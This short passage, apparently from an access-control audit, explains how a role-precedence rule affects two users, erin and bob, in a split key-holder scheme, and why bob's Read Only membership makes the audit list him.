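Note that erin, who is in both key-holder groups, is shown only the first part, exactly as the precedence rule states; the split is still undermined by bob, whose Read Only membership outranks his second-part role, which is why the audit lists him.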